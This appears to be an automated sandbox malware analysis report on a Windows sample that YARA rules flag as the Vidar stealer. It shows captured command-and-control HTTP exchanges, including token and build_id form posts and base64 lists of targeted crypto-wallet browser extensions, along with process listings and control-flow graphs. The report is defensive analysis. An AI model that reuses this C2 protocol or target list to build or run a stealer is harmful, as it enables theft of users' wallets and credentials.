                                                          Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 36 62 62 66 62 61 34 65 63 36 34 38 66 39 61 37 33 64 38 36 61 33 61 35 66 39 63 37 37 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 66 36 34 31 61 63 63 65 33 66 38 63 38 35 62 66 32 34 39 30 61 39 62 33 61 61 39 37 32 63 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 4a 4a 44 48 4a 45 47 48 4a 4b 45 43 42 47 43 46 48 2d 2d 0d 0a
                                                          Data Ascii: ------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="token"7c6bbfba4ec648f9a73d86a3a5f9c771------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="build_id"af641acce3f8c85bf2490a9b3aa972c5------KFHJJDHJEGHJKECBGCFHContent-Disposition: form-data; name="mode"21------KFHJJDHJEGHJKECBGCFH--
                                                          Oct 7, 2024 18:46:35.936810017 CEST224INData Raw: 6b 63 47 52 74 61 32 46 68 61 32 56 71 62 6d 68 68 5a 58 77 78 66 44 42 38 4d 48 78 51 62 32 78 35 62 57 56 7a 61 46 64 68 62 47 78 6c 64 48 77 78 66 47 70 76 61 6d 68 6d 5a 57 39 6c 5a 47 74 77 61 32 64 73 59 6d 5a 70 62 57 52 6d 59 57 4a 77 5a
                                                          Data Ascii: kcGRta2Fha2VqbmhhZXwxfDB8MHxQb2x5bWVzaFdhbGxldHwxfGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHwxfGZscGljaWlsZW1naGJtZmFsaWNham9vbGhra2VuZmVsfDF8MHwwfENvaW45OHwxfGFlYWNoa25tZWZwaGVwY2Npb25ib29oY2tvbm9lZW1nfDF
                                                          Oct 7, 2024 18:46:35.936852932 CEST1236INData Raw: 38 4d 48 77 77 66 45 56 57 52 56 49 67 56 32 46 73 62 47 56 30 66 44 46 38 59 32 64 6c 5a 57 39 6b 63 47 5a 68 5a 32 70 6a 5a 57 56 6d 61 57 56 6d 62 47 31 6b 5a 6e 42 6f 63 47 78 72 5a 57 35 73 5a 6d 74 38 4d 58 77 77 66 44 42 38 53 32 46 79 5a
                                                          Data Ascii: 8MHwwfEVWRVIgV2FsbGV0fDF8Y2dlZW9kcGZhZ2pjZWVmaWVmbG1kZnBocGxrZW5sZmt8MXwwfDB8S2FyZGlhQ2hhaW58MXxwZGFkamtma2djYWZnYmNlaW1jcGJrYWxuZm5lcGJua3wxfDB8MHxSYWJieXwxfGFjbWFjb2RramJkZ21vbGVlYm9sbWRqb25pbGtkYmNofDF8MHwwfFBoYW50b218MXxiZm5hZWxtb21laW1obH
                                                          Oct 7, 2024 18:46:35.936862946 CEST1236INData Raw: 6c 63 48 42 6e 5a 48 42 6f 66 44 46 38 4d 48 77 77 66 45 56 34 62 32 52 31 63 79 42 58 5a 57 49 7a 49 46 64 68 62 47 78 6c 64 48 77 78 66 47 46 6f 62 32 78 77 5a 6d 52 70 59 57 78 71 5a 32 70 6d 61 47 39 74 61 57 68 72 61 6d 4a 74 5a 32 70 70 5a
                                                          Data Ascii: lcHBnZHBofDF8MHwwfEV4b2R1cyBXZWIzIFdhbGxldHwxfGFob2xwZmRpYWxqZ2pmaG9taWhramJtZ2ppZGxjZG5vfDF8MHwwfEJyYWF2b3N8MXxqbmxnYW1lY2JwbWJhampmaG1tbWxoZWprZW1lamRtYXwxfDB8MHxFbmtyeXB0fDF8a2twbGxrb2RqZWxvaWRpZWVkb2pvZ2FjZmhwYWlob2h8MXwwfDB8T0tYIFdlYjMgV2
                                                          Oct 7, 2024 18:46:36.578031063 CEST282INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Mon, 07 Oct 2024 16:46:36 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                          Oct 7, 2024 18:47:11.725433111 CEST13.107.246.45443192.168.2.449769CN=*.azureedge.net, O=Microsoft Corporation, L=Redmond, ST=WA, C=US CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Sep 19 17:30:52 CEST 2024 Thu Jun 08 02:00:00 CEST 2023 Thu Aug 01 14:00:00 CEST 2013Sun Sep 14 17:30:52 CEST 2025 Wed Aug 26 01:59:59 CEST 2026 Fri Jan 15 13:00:00 CET 2038771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,028a2c9bd18a11de089ef85a160da29e4
                                                          CN=Microsoft Azure RSA TLS Issuing CA 04, O=Microsoft Corporation, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Jun 08 02:00:00 CEST 2023Wed Aug 26 01:59:59 CEST 2026
                                                          CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Aug 01 14:00:00 CEST 2013Fri Jan 15 13:00:00 CET 2038

                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:12:46:08
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\Desktop\lCVFGKfczi.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\lCVFGKfczi.exe"
                                                          Imagebase:0xdc0000
                                                          File size:584'704 bytes
                                                          MD5 hash:B84100C670BB19E92BFB62423048AA43
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:1
                                                          Start time:12:46:09
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          Imagebase:0x240000
                                                          File size:262'432 bytes
                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:12:46:09
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          Imagebase:0x210000
                                                          File size:262'432 bytes
                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:12:46:09
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                          Imagebase:0xbb0000
                                                          File size:262'432 bytes
                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:12:46:09
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 276
                                                          Imagebase:0x360000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:12:46:36
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1428
                                                          Imagebase:0x360000
                                                          File size:483'680 bytes
                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:1.1%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:6.1%
                                                            Total number of Nodes:229
                                                            Total number of Limit Nodes:4
                                                            execution_graph 39095 dc6dd6 39096 dc6de2 __FrameHandler3::FrameUnwindToState 39095->39096 39121 dc6fd2 39096->39121 39098 dc6de9 39099 dc6f3c 39098->39099 39109 dc6e13 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 39098->39109 39149 dc7922 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter __FrameHandler3::FrameUnwindToState 39099->39149 39101 dc6f43 39150 dd103b 23 API calls __FrameHandler3::FrameUnwindToState 39101->39150 39103 dc6f49 39151 dd0fff 23 API calls __FrameHandler3::FrameUnwindToState 39103->39151 39105 dc6f51 39106 dc6e32 39107 dc6eb3 39129 dc7a37 39107->39129 39109->39106 39109->39107 39145 dd1015 43 API calls 3 library calls 39109->39145 39110 dc6eb9 39133 dc2021 39110->39133 39115 dc6ed5 39115->39101 39116 dc6ed9 39115->39116 39117 dc6ee2 39116->39117 39147 dd0ff0 23 API calls __FrameHandler3::FrameUnwindToState 39116->39147 39148 dc7143 79 API calls ___scrt_uninitialize_crt 39117->39148 39120 dc6eea 39120->39106 39122 dc6fdb 39121->39122 39152 dc729c IsProcessorFeaturePresent 39122->39152 39124 dc6fe7 39153 dca1be 10 API calls 2 library calls 39124->39153 39126 dc6ff0 39126->39098 39127 dc6fec 39127->39126 39154 dca1dd 7 API calls 2 library calls 39127->39154 39155 dc8240 39129->39155 39131 dc7a4a GetStartupInfoW 39132 dc7a5d 39131->39132 39132->39110 39134 dc206a 39133->39134 39156 dc2003 GetPEB 39134->39156 39136 dc2223 39157 dc1bee 39136->39157 39141 dc273f 39143 dc1bee 74 API calls 39141->39143 39142 dc2783 39146 dc7a6d GetModuleHandleW 39142->39146 39144 dc2755 AttachConsole 39143->39144 39144->39142 39145->39107 39146->39115 39147->39117 39148->39120 39149->39101 39150->39103 39151->39105 39152->39124 39153->39127 39154->39126 39155->39131 39156->39136 39158 dc1c1a 39157->39158 39165 dc1cc0 39158->39165 39193 dc49a4 44 API calls 5 library calls 39158->39193 39161 dc1d62 39186 dc6ca2 39161->39186 39164 dc1d75 39168 dc1f49 39164->39168 39167 dc1d52 39165->39167 39194 dc278c 74 API calls 3 library calls 39165->39194 39195 dc3b06 74 API calls 39165->39195 39182 dc44af 39167->39182 39169 dc1fb9 39168->39169 39174 dc1f89 39168->39174 39171 dc6ca2 CatchGuardHandler 5 API calls 39169->39171 39172 dc1fcc VirtualProtect 39171->39172 39172->39141 39172->39142 39174->39169 39175 dc1fd0 39174->39175 39198 dc28d3 44 API calls 2 library calls 39174->39198 39199 dc1d79 74 API calls codecvt 39174->39199 39200 dc3198 43 API calls _Deallocate 39174->39200 39201 dc3b38 74 API calls 4 library calls 39175->39201 39178 dc1fda 39202 dc3b06 74 API calls 39178->39202 39180 dc1fe0 39203 dc3198 43 API calls _Deallocate 39180->39203 39183 dc44bc 39182->39183 39184 dc44c9 codecvt 39182->39184 39196 dc1286 43 API calls 2 library calls 39183->39196 39184->39161 39187 dc6caa 39186->39187 39188 dc6cab IsProcessorFeaturePresent 39186->39188 39187->39164 39190 dc764d 39188->39190 39197 dc7610 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 39190->39197 39192 dc7730 39192->39164 39193->39158 39194->39165 39195->39165 39196->39184 39197->39192 39198->39174 39199->39174 39200->39174 39201->39178 39202->39180 39203->39169 39204 ddfe10 39207 dda34b 39204->39207 39208 dda354 39207->39208 39209 dda386 39207->39209 39213 dd4f6c 39208->39213 39214 dd4f7d 39213->39214 39215 dd4f77 39213->39215 39219 dd4f83 39214->39219 39265 dd61e9 6 API calls std::_Lockit::_Lockit 39214->39265 39264 dd61aa 6 API calls std::_Lockit::_Lockit 39215->39264 39218 dd4f97 39218->39219 39220 dd4f9b 39218->39220 39221 dd4f88 39219->39221 39273 dd0409 43 API calls __FrameHandler3::FrameUnwindToState 39219->39273 39266 dd3462 14 API calls 3 library calls 39220->39266 39241 dda156 39221->39241 39224 dd4fa7 39226 dd4faf 39224->39226 39227 dd4fc4 39224->39227 39267 dd61e9 6 API calls std::_Lockit::_Lockit 39226->39267 39269 dd61e9 6 API calls std::_Lockit::_Lockit 39227->39269 39230 dd4fd0 39232 dd4fd4 39230->39232 39233 dd4fe3 39230->39233 39231 dd4fbb 39268 dd3a49 14 API calls __dosmaperr 39231->39268 39270 dd61e9 6 API calls std::_Lockit::_Lockit 39232->39270 39271 dd4cdf 14 API calls __Getctype 39233->39271 39237 dd4fee 39272 dd3a49 14 API calls __dosmaperr 39237->39272 39238 dd4fc1 39238->39219 39240 dd4ff5 39240->39221 39274 dda2ab 39241->39274 39246 dda199 39246->39209 39249 dda1c0 39301 dda3a6 39249->39301 39250 dda1b2 39312 dd3a49 14 API calls __dosmaperr 39250->39312 39254 dda1f8 39313 dcdd6d 14 API calls __dosmaperr 39254->39313 39256 dda1fd 39314 dd3a49 14 API calls __dosmaperr 39256->39314 39257 dda23f 39260 dda288 39257->39260 39316 dd9dc8 43 API calls 2 library calls 39257->39316 39259 dda213 39259->39257 39315 dd3a49 14 API calls __dosmaperr 39259->39315 39317 dd3a49 14 API calls __dosmaperr 39260->39317 39264->39214 39265->39218 39266->39224 39267->39231 39268->39238 39269->39230 39270->39231 39271->39237 39272->39240 39275 dda2b7 __FrameHandler3::FrameUnwindToState 39274->39275 39276 dda2d1 39275->39276 39318 dcddc1 EnterCriticalSection 39275->39318 39278 dda180 39276->39278 39321 dd0409 43 API calls __FrameHandler3::FrameUnwindToState 39276->39321 39285 dd9ed6 39278->39285 39279 dda30d 39320 dda32a LeaveCriticalSection std::_Lockit::~_Lockit 39279->39320 39283 dda2e1 39283->39279 39319 dd3a49 14 API calls __dosmaperr 39283->39319 39322 dcfe67 39285->39322 39288 dd9f09 39290 dd9f20 39288->39290 39291 dd9f0e GetACP 39288->39291 39289 dd9ef7 GetOEMCP 39289->39290 39290->39246 39292 dd3a83 39290->39292 39291->39290 39293 dd3ac1 39292->39293 39294 dd3a91 39292->39294 39334 dcdd6d 14 API calls __dosmaperr 39293->39334 39296 dd3aac HeapAlloc 39294->39296 39299 dd3a95 __Getctype 39294->39299 39298 dd3abf 39296->39298 39296->39299 39297 dd3ac6 39297->39249 39297->39250 39298->39297 39299->39293 39299->39296 39333 dd0478 EnterCriticalSection LeaveCriticalSection std::ios_base::_Init 39299->39333 39302 dd9ed6 45 API calls 39301->39302 39303 dda3c6 39302->39303 39305 dda403 IsValidCodePage 39303->39305 39310 dda43f __FrameHandler3::FrameUnwindToState 39303->39310 39304 dc6ca2 CatchGuardHandler 5 API calls 39306 dda1ed 39304->39306 39307 dda415 39305->39307 39305->39310 39306->39254 39306->39259 39308 dda41e __FrameHandler3::FrameUnwindToState 39307->39308 39309 dda444 GetCPInfo 39307->39309 39335 dd9faa 39308->39335 39309->39308 39309->39310 39310->39304 39312->39246 39313->39256 39314->39246 39315->39257 39316->39260 39317->39246 39318->39283 39319->39279 39320->39276 39323 dcfe85 39322->39323 39324 dcfe7e 39322->39324 39323->39324 39330 dd4eb1 43 API calls 3 library calls 39323->39330 39324->39288 39324->39289 39326 dcfea6 39331 dd3ad1 43 API calls __Getctype 39326->39331 39328 dcfebc 39332 dd3b2f 43 API calls _Fputc 39328->39332 39330->39326 39331->39328 39332->39324 39333->39299 39334->39297 39336 dd9fd2 GetCPInfo 39335->39336 39345 dda09b 39335->39345 39337 dd9fea 39336->39337 39336->39345 39346 dd8d25 39337->39346 39339 dc6ca2 CatchGuardHandler 5 API calls 39341 dda154 39339->39341 39341->39310 39344 dd901c 48 API calls 39344->39345 39345->39339 39347 dcfe67 std::_Locinfo::_Locinfo_dtor 43 API calls 39346->39347 39348 dd8d45 39347->39348 39366 dd94ae 39348->39366 39350 dd8e09 39352 dc6ca2 CatchGuardHandler 5 API calls 39350->39352 39351 dd8e01 39369 dc6c84 14 API calls ___vcrt_freefls@4 39351->39369 39356 dd8e2c 39352->39356 39353 dd8d72 39353->39350 39353->39351 39355 dd3a83 std::_Locinfo::_Locinfo_dtor 15 API calls 39353->39355 39357 dd8d97 __FrameHandler3::FrameUnwindToState std::_Locinfo::_Locinfo_dtor 39353->39357 39355->39357 39361 dd901c 39356->39361 39357->39351 39358 dd94ae std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 39357->39358 39359 dd8de2 39358->39359 39359->39351 39360 dd8ded GetStringTypeW 39359->39360 39360->39351 39362 dcfe67 std::_Locinfo::_Locinfo_dtor 43 API calls 39361->39362 39363 dd902f 39362->39363 39370 dd8e2e 39363->39370 39368 dd94bf MultiByteToWideChar 39366->39368 39368->39353 39369->39350 39371 dd8e49 39370->39371 39372 dd94ae std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 39371->39372 39376 dd8e8f 39372->39376 39373 dd9007 39374 dc6ca2 CatchGuardHandler 5 API calls 39373->39374 39375 dd901a 39374->39375 39375->39344 39376->39373 39377 dd3a83 std::_Locinfo::_Locinfo_dtor 15 API calls 39376->39377 39379 dd8eb5 std::_Locinfo::_Locinfo_dtor 39376->39379 39387 dd8f3b 39376->39387 39377->39379 39380 dd94ae std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 39379->39380 39379->39387 39381 dd8efa 39380->39381 39381->39387 39398 dd6368 39381->39398 39384 dd8f2c 39384->39387 39390 dd6368 std::_Locinfo::_Locinfo_dtor 7 API calls 39384->39390 39385 dd8f64 39386 dd8fef 39385->39386 39388 dd3a83 std::_Locinfo::_Locinfo_dtor 15 API calls 39385->39388 39391 dd8f76 std::_Locinfo::_Locinfo_dtor 39385->39391 39409 dc6c84 14 API calls ___vcrt_freefls@4 39386->39409 39410 dc6c84 14 API calls ___vcrt_freefls@4 39387->39410 39388->39391 39390->39387 39391->39386 39392 dd6368 std::_Locinfo::_Locinfo_dtor 7 API calls 39391->39392 39393 dd8fb9 39392->39393 39393->39386 39407 dd952a WideCharToMultiByte 39393->39407 39395 dd8fd3 39395->39386 39396 dd8fdc 39395->39396 39408 dc6c84 14 API calls ___vcrt_freefls@4 39396->39408 39411 dd5f14 39398->39411 39401 dd6379 LCMapStringEx 39406 dd63c0 39401->39406 39402 dd63a0 39414 dd63c5 5 API calls std::_Locinfo::_Locinfo_dtor 39402->39414 39405 dd63b9 LCMapStringW 39405->39406 39406->39384 39406->39385 39406->39387 39407->39395 39408->39387 39409->39387 39410->39373 39415 dd6015 39411->39415 39414->39405 39416 dd6043 39415->39416 39420 dd5f2a 39415->39420 39416->39420 39422 dd5f4a LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary ___vcrt_InitializeCriticalSectionEx 39416->39422 39418 dd6057 39419 dd605d GetProcAddress 39418->39419 39418->39420 39419->39420 39421 dd606d std::_Lockit::_Lockit 39419->39421 39420->39401 39420->39402 39421->39420 39422->39418

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 dc2021-dc2068 1 dc206a-dc206d 0->1 2 dc2074-dc207f 0->2 3 dc206f-dc2072 1->3 4 dc20bb-dc20c8 1->4 5 dc2083-dc209e 2->5 3->5 7 dc20cb-dc20e5 4->7 5->4 6 dc20a0-dc20a6 5->6 8 dc20ee-dc20f9 6->8 9 dc20a8-dc20b9 6->9 7->8 10 dc20e7-dc20ec 7->10 11 dc20fd-dc211d 8->11 9->7 10->11 12 dc213e-dc2147 11->12 13 dc211f-dc2122 11->13 16 dc214a-dc215a 12->16 14 dc2124-dc213c 13->14 15 dc2163-dc217b 13->15 14->16 18 dc217f-dc218c 15->18 16->15 17 dc215c-dc2161 16->17 17->18 19 dc218e-dc2195 18->19 20 dc2197-dc21a2 18->20 21 dc21a6-dc21c1 19->21 20->21 22 dc21d2-dc21ed 21->22 23 dc21c3-dc21c6 21->23 26 dc21f0-dc21f3 22->26 24 dc21fe-dc2202 23->24 25 dc21c8-dc21d0 23->25 28 dc2204-dc2266 call dc2003 24->28 25->26 26->24 27 dc21f5-dc21fc 26->27 27->28 31 dc2278-dc2289 28->31 32 dc2268-dc226e 28->32 35 dc228d-dc2294 31->35 33 dc22a6-dc22c2 32->33 34 dc2270-dc2276 32->34 37 dc22c6-dc22cf 33->37 34->35 35->33 36 dc2296-dc2299 35->36 38 dc22f9-dc2301 36->38 39 dc229b-dc22a4 36->39 37->38 40 dc22d1-dc22d7 37->40 43 dc2304-dc230d 38->43 39->37 41 dc22d9-dc22f7 40->41 42 dc2330-dc2343 40->42 41->43 44 dc2345-dc2350 42->44 43->42 45 dc230f-dc2312 43->45 46 dc2361-dc2374 44->46 47 dc2352-dc235f 44->47 45->46 48 dc2314-dc232e 45->48 49 dc2376-dc2389 46->49 47->49 48->44 50 dc23aa-dc23af 49->50 51 dc238b-dc23a8 49->51 52 dc23b1-dc23cc 50->52 51->52 53 dc23ce-dc23dd 52->53 54 dc23df-dc23e4 52->54 55 dc23e8-dc23ee 53->55 54->55 56 dc23fb-dc2406 55->56 57 dc23f0-dc23f9 55->57 58 dc2409-dc2410 56->58 57->58 59 dc2416-dc2427 58->59 60 dc2412-dc2414 58->60 61 dc2428-dc2430 59->61 60->61 62 dc2437-dc244f 61->62 63 dc2432-dc2435 61->63 64 dc2453-dc2454 62->64 63->64 65 dc246e-dc2480 64->65 66 dc2456-dc246c 64->66 67 dc2483-dc24a1 65->67 66->67 68 dc24c3 67->68 69 dc24a3-dc24c1 67->69 70 dc24c6-dc254a call dc1bee 68->70 69->70 73 dc254c-dc254f 70->73 74 dc256a-dc2582 70->74 75 dc25b8-dc25c5 73->75 76 dc2551-dc2568 73->76 77 dc2584-dc259e 74->77 79 dc25ca-dc25e6 75->79 76->77 77->75 78 dc25a0-dc25b6 77->78 78->79 80 dc25e8-dc25eb 79->80 81 dc25f2-dc25f7 79->81 82 dc261c-dc2625 80->82 83 dc25ed-dc25f0 80->83 84 dc25fa-dc2609 81->84 86 dc2629-dc262d 82->86 83->84 84->82 85 dc260b-dc260e 84->85 87 dc2610-dc261a 85->87 88 dc2642-dc2656 85->88 86->88 89 dc262f-dc2632 86->89 87->86 92 dc2658-dc266e 88->92 90 dc2634-dc2640 89->90 91 dc2681-dc269c 89->91 90->92 93 dc269d-dc26b1 91->93 92->91 94 dc2670-dc267f 92->94 95 dc26c0-dc26da 93->95 96 dc26b3-dc26be 93->96 94->93 97 dc26dd-dc273d call dc1f49 VirtualProtect 95->97 96->97 100 dc273f-dc277a call dc1bee AttachConsole 97->100 101 dc2783-dc2789 97->101 100->101
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(00E4DCD8,?,00000040,?), ref: 00DC2738
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1826186541.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1826162383.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826215640.0000000000DE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826251966.0000000000DED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826300085.0000000000E4D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826328291.0000000000E4F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1826363710.0000000000E50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_dc0000_lCVFGKfczi.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID: '$S$a
                                                            • API String ID: 544645111-1060379873
                                                            • Opcode ID: 8e07eca4ab498d7688db5e738af865ea92c31744332cf77bed8d5a3861286eef
                                                            • Instruction ID: c21d703ca0ec9edd84199f7b357ca3648140ff3e8ab427eccf1266583cd455d0
                                                            • Opcode Fuzzy Hash: 8e07eca4ab498d7688db5e738af865ea92c31744332cf77bed8d5a3861286eef
                                                            • Instruction Fuzzy Hash: 4FF1E127934E1B06E708603D8C927F6958AD7EA330F95433BBE63DB3F4E36949419254

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 104 dd8e2e-dd8e47 105 dd8e5d-dd8e62 104->105 106 dd8e49-dd8e59 call dd044d 104->106 108 dd8e64-dd8e6e 105->108 109 dd8e71-dd8e97 call dd94ae 105->109 106->105 112 dd8e5b 106->112 108->109 114 dd8e9d-dd8ea8 109->114 115 dd900a-dd901b call dc6ca2 109->115 112->105 117 dd8ffd 114->117 118 dd8eae-dd8eb3 114->118 122 dd8fff 117->122 120 dd8ec8-dd8ed3 call dd3a83 118->120 121 dd8eb5-dd8ebe call dc7270 118->121 129 dd8ede-dd8ee2 120->129 130 dd8ed5 120->130 121->129 132 dd8ec0-dd8ec6 121->132 123 dd9001-dd9008 call dc6c84 122->123 123->115 129->122 134 dd8ee8-dd8eff call dd94ae 129->134 133 dd8edb 130->133 132->133 133->129 134->122 137 dd8f05-dd8f17 call dd6368 134->137 139 dd8f1c-dd8f20 137->139 140 dd8f3b-dd8f3d 139->140 141 dd8f22-dd8f2a 139->141 140->122 142 dd8f2c-dd8f31 141->142 143 dd8f64-dd8f70 141->143 146 dd8f37-dd8f39 142->146 147 dd8fe3-dd8fe5 142->147 144 dd8fef 143->144 145 dd8f72-dd8f74 143->145 150 dd8ff1-dd8ff8 call dc6c84 144->150 148 dd8f89-dd8f94 call dd3a83 145->148 149 dd8f76-dd8f7f call dc7270 145->149 146->140 151 dd8f42-dd8f5c call dd6368 146->151 147->123 148->150 162 dd8f96 148->162 149->150 161 dd8f81-dd8f87 149->161 150->140 151->147 160 dd8f62 151->160 160->140 163 dd8f9c-dd8fa1 161->163 162->163 163->150 164 dd8fa3-dd8fbb call dd6368 163->164 164->150 167 dd8fbd-dd8fc4 164->167 168 dd8fe7-dd8fed 